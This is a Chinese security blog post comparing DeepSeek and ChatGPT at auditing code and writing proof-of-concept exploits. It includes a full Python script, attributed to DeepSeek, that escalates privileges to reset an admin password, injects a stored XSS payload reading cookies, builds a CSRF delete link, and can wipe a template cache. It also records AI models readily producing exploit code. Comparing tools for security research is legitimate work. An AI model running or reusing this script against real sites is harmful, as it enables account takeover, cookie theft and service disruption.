DeepSeek与ChatGPT代码审计能力对比与分析

admin 2025年2月11日00:16:30评论45 views字数 2524阅读8分24秒阅读模式

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

免责声明

道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

DeepSeek与ChatGPT代码审计能力对比与分析

常规代码审计能力

先来看下ChatGPT的能力

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

这里看下

让我手动审查代码后,再给出详细的漏洞利用方法。

后面给出的审计代码

DeepSeek与ChatGPT代码审计能力对比与分析

ChatGPT完全是利用正则去匹配关键字,判断是否存在漏洞

DeepSeek与ChatGPT代码审计能力对比与分析

给出的继续审计的逻辑代码也还是通过正则匹配

再来看下DeepSeek的审计能力

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

他这个深度思考这里还是可以学到很多东西的,他会把整个审计的过程包括如何去审计显示出来

然而DeepSeek审计出的漏洞和ChatGPT完全不同

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

代码审计方式分析

ChatGPT就不说了,上面已经给出用来审计代码的代码,完全是根据正则匹配是否存在漏洞

问了一下DeepSeek是怎么审计的,看下DeepSeek如何解释:

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

这里才是经典

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

先不管审计到的是否是误报,这种审计方式几乎超越所有的大模型!

DeepSeek与ChatGPT代码审计能力对比与分析

POC开发能力

还是先看ChatGPT

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

无力感是不是涌上心头?

再来看下DeepSeek

DeepSeek与ChatGPT代码审计能力对比与分析

他会将人类的思考思路写出来,这块是一个很好的开发、渗透思路学习的地方

DeepSeek与ChatGPT代码审计能力对比与分析

完整代码

import requestsfrom urllib.parse import urljoin# 目标配置TARGET_URL = "http://target-site.com/"USERNAME = "lowpriv_user"PASSWORD = "123456"PROXY = {"http": "http://127.0.0.1:8080"}  # 可选Burp代理调试# 初始化会话session = requests.Session()session.proxies = PROXYdef login():    """登录获取权限"""    login_url = urljoin(TARGET_URL, "/Admin/Admin/Login")    data = {        "username": USERNAME,        "login_pwd": PASSWORD    }    resp = session.post(login_url, data=data)    return "登录成功" in resp.textdef horizontal_privilege_escalation():    """水平越权修改其他管理员信息"""    # 假设当前用户ID为2,尝试修改ID为1的管理员    target_id = 1      save_url = urljoin(TARGET_URL, "/Admin/Admin/Save")    data = {        "id": target_id,        "role_id": 1,  # 修改为管理员角色        "mobile": "18888888888",  # 篡改手机号        "login_pwd": "hacked123"  # 修改密码    }    resp = session.post(save_url, data=data)    if "operation_add_success" in resp.text:        print(f"[+] 越权成功!已修改管理员ID {target_id} 的密码为 hacked123")    else:        print("[-] 越权失败")def csrf_exploit():    """CSRF删除文章(需在管理员浏览器触发)"""    # 构造恶意删除链接(假设文章ID=1)    delete_url = urljoin(TARGET_URL, "/Admin/Article/Delete?id=1")    print(f"[*] 将以下URL发送给管理员点击:n{delete_url}")def xss_injection():    """存储型XSS注入文章内容"""    save_url = urljoin(TARGET_URL, "/Admin/Article/Save")    payload = "<script>alert(document.cookie)</script>"    data = {        "title": "XSS测试",        "content": payload,        "is_enable": 1,        "article_class_id": 1    }    resp = session.post(save_url, data=data)    if "operation_add_success" in resp.text:        print("[+] XSS注入成功!查看文章列表触发弹窗")    else:        print("[-] XSS注入失败")def cache_wipe():    """清理模板缓存(需管理员权限)"""    cache_url = urljoin(TARGET_URL, "/Admin/Cache/TemplateUpdate")    resp = session.get(cache_url)    if "operation_update_success" in resp.text:        print("[+] 缓存清理成功,可能导致服务中断")    else:        print("[-] 缓存清理失败")if __name__ == "__main__":    if login():        print("[*] 登录成功,开始漏洞验证")        horizontal_privilege_escalation()        xss_injection()        csrf_exploit()        # cache_wipe()  # 谨慎使用    else:        print("[-] 登录失败,检查凭据")

还是很强的

DeepSeek与ChatGPT代码审计能力对比与分析

已知漏洞POC开发对比

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

这里还是ChatGPT更胜一筹!

看下DeepSeek的回答

DeepSeek与ChatGPT代码审计能力对比与分析

DeepSeek与ChatGPT代码审计能力对比与分析

这里不知道是我用的国内的IP访问的问题还是怎么回事,前面看说DeepSeek是弱道德的大模型。。。

综合对比之下,代码审计分析能力deepseek强于ChatGPT很多,但是让deepseek写审计出来漏洞利用代码的时候还是可以写,让写CVE的poc居然不行了,可能是我询问的方式不对。

这里简单分析了一下,后面我会自己审计几个漏洞或者去互联网找几个公开漏洞,将代码分别上传到ChatGPT、DeepSeek、kimi去对比分析

DeepSeek与ChatGPT代码审计能力对比与分析

原文始发于微信公众号(道一安全):DeepSeek与ChatGPT代码审计能力对比与分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月11日00:16:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DeepSeek与ChatGPT代码审计能力对比与分析https://cn-sec.com/archives/3689060.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息